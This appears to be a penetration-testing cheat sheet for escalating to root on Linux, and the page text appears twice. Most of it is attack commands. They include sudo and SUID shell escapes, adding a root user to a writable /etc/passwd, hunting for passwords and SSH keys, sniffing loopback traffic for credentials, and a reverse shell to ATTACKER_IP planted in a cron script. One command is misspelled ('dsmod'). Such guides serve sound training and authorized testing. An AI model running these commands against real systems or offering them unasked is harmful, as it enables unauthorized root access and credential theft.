Linux Privilege Escalation

If you’ve got a foothold on a Linux target during OSCP-style enumeration, here’s a no-nonsense walkthrough of techniques I use to go from low-priv user to root.

Automated Enumeration Tools

# linPEAS (best all-in-one)
./linpeas.sh

# LinEnum (quick recon)
./LinEnum.sh

# Linux Exploit Suggester
./linux-exploit-suggester.sh

Use these when you're stuck or want to double-check your manual recon.

While automated scans are useful, starting with a manual sweep is often quicker and more efficient.

Manual Enumeration

Initial Enumeration

# Identify system, kernel, and architecture
whoami && id
uname -a
cat /etc/os-release
lscpu
hostname

# Users, groups, and history
cat /etc/passwd
cat /etc/group
cat ~/.bash_history

# Network discovery
ip a
ip route
netstat -tunlp

# Check sudo permissions
sudo -l

Sudo Privileges (GTFOBins)

# If any common binaries are listed in sudo -l, check GTFOBins
sudo find . -exec /bin/sh \; -quit
sudo vim -c ':!sh'
sudo awk 'BEGIN {system("/bin/sh")}’
sudo less /etc/passwd  # then use !/bin/sh

SUID Binaries

# Find binaries with SUID bit set
find / -perm -4000 -type f 2>/dev/null

If you find something like bash, find, cp, or python, check GTFOBins for how to abuse them. Example:

./bash -p

Writable /etc/passwd

# If /etc/passwd is writable, generate a root hash
openssl passwd -1 w00t

# Append a new root user
echo "root2:<HASH>:0:0:root:/root:/bin/bash" >> /etc/passwd

# Switch user
su root2

Crontab + Writable Scripts

# List all cron jobs
ls -la /etc/cron*
crontab -l

If a script run by cron is writable:

echo "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" >> /path/to/script.sh

Password Hunting

# Hardcoded or leaked passwords
grep -iR "password" / 2>/dev/null
find / -name id_rsa 2>/dev/null

# .bash_history and config files
cat ~/.bash_history
find / -name '*config*' 2>/dev/null

Kernel Exploits

# Kernel info
uname -r

# Use exploit suggester
linux-exploit-suggester.sh

# Compile and run exploit
gcc exploit.c -o exploit
./exploit

Try kernel exploits only if everything else fails.

Environment Variables & User Trails

# Check env vars for secrets
env | grep -i pass

# Also check .bashrc or init scripts
cat ~/.bashrc

Capabilities and setcap

# Find binaries with Linux capabilities
getcap -r / 2>/dev/null

If cap_setuid is set on python, perl, or bash, you can likely escalate via GTFOBins method.

⚡ Bonus: TCPDump Credentials via Loopback

# If you can run tcpdump with sudo
sudo tcpdump -i lo -A | grep pass

This dumps loopback traffic. Sometimes web creds are sent locally.

Check These Too

# World writable files/dirs
find / -writable -type d 2>/dev/null

# Mounted disks
mount
lsblk
cat /etc/fstab

# Loaded kernel modules
dsmod
/sbin/modinfo <module>

PreviousPrivilege Escalation NextDisk Group PrivEsc

Last updated 2 days ago

Was this helpful?

Linux Privilege Escalation

If you’ve got a foothold on a Linux target during OSCP-style enumeration, here’s a no-nonsense walkthrough of techniques I use to go from low-priv user to root.

Automated Enumeration Tools

# linPEAS (best all-in-one)
./linpeas.sh

# LinEnum (quick recon)
./LinEnum.sh

# Linux Exploit Suggester
./linux-exploit-suggester.sh

Use these when you're stuck or want to double-check your manual recon.

While automated scans are useful, starting with a manual sweep is often quicker and more efficient.

Manual Enumeration

Initial Enumeration

# Identify system, kernel, and architecture
whoami && id
uname -a
cat /etc/os-release
lscpu
hostname

# Users, groups, and history
cat /etc/passwd
cat /etc/group
cat ~/.bash_history

# Network discovery
ip a
ip route
netstat -tunlp

# Check sudo permissions
sudo -l

Sudo Privileges (GTFOBins)

# If any common binaries are listed in sudo -l, check GTFOBins
sudo find . -exec /bin/sh \; -quit
sudo vim -c ':!sh'
sudo awk 'BEGIN {system("/bin/sh")}’
sudo less /etc/passwd  # then use !/bin/sh

Check for payloads tied to your allowed binaries.

SUID Binaries

# Find binaries with SUID bit set
find / -perm -4000 -type f 2>/dev/null

If you find something like bash, find, cp, or python, check GTFOBins for how to abuse them. Example:

./bash -p

Writable /etc/passwd

# If /etc/passwd is writable, generate a root hash
openssl passwd -1 w00t

# Append a new root user
echo "root2:<HASH>:0:0:root:/root:/bin/bash" >> /etc/passwd

# Switch user
su root2

Crontab + Writable Scripts

# List all cron jobs
ls -la /etc/cron*
crontab -l

If a script run by cron is writable:

echo "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" >> /path/to/script.sh

Password Hunting

# Hardcoded or leaked passwords
grep -iR "password" / 2>/dev/null
find / -name id_rsa 2>/dev/null

# .bash_history and config files
cat ~/.bash_history
find / -name '*config*' 2>/dev/null

Kernel Exploits

# Kernel info
uname -r

# Use exploit suggester
linux-exploit-suggester.sh

# Compile and run exploit
gcc exploit.c -o exploit
./exploit

Try kernel exploits only if everything else fails.

Environment Variables & User Trails

# Check env vars for secrets
env | grep -i pass

# Also check .bashrc or init scripts
cat ~/.bashrc

Capabilities and setcap

# Find binaries with Linux capabilities
getcap -r / 2>/dev/null

If cap_setuid is set on python, perl, or bash, you can likely escalate via GTFOBins method.

⚡ Bonus: TCPDump Credentials via Loopback

# If you can run tcpdump with sudo
sudo tcpdump -i lo -A | grep pass

This dumps loopback traffic. Sometimes web creds are sent locally.

Check These Too

# World writable files/dirs
find / -writable -type d 2>/dev/null

# Mounted disks
mount
lsblk
cat /etc/fstab

# Loaded kernel modules
dsmod
/sbin/modinfo <module>

PreviousPrivilege Escalation NextDisk Group PrivEsc

Last updated 2 days ago

Was this helpful?